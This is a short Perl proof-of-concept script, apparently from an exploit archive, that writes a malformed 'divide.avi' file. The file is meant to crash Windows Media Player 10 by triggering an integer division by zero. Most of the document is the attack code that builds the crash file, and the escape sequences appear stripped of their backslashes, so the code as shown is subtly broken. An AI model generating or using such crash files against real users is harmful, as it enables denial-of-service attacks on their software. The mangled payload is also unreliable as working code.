#!/usr/bin/perl

# Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .

# Title  : Windows Media Player 10 - .avi Integer Division By Zero Vulnerability
# Author : Dark-Puzzle (Souhail Hammou)
# Type   : DoS/PoC
# Risk   : Medium
# Vendor : Microsoft
# Versions : 10 Other Version May Be Vulnerable .
# Tested On : Windows XP SP2 .
# Date : 13 October 2012
# ---------------------------------------------------------- #
# Vulnerability Details : 
# Division By zero Vulnerability in Microsoft Windows Media Player Consists to divide the value of a register by Zero .
# In this case it is the ECX register executing a command DIV ECX as well known.
# This will cause an Integer division by Zero --> Exception Can't be Handled --> CRASH .
# Tested Just On Version "10" Might be working on other Versions .

# POC :


my $m = "MThd";
my $div =
"x00x00x00x06x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xffxffx00xffx00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x06x00x00x00x66x66x66x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00xffxffxffx00x00x00x00x00";


open(myfile,'>divide.avi');
print myfile $m.$div;
close(myfile);
print "Windows Media Player 10 - .avi Integer Division By Zero Vulnerabilityn";
print "x44x69x73x63x6Fx76x65x72x65x64x20x26x20x50x6Fx43x20x42x79x20x44x61x72x6Bx2Dx50x75x7Ax7Ax6Cx65n";
print "Creating File Please Waitn";
sleep 5;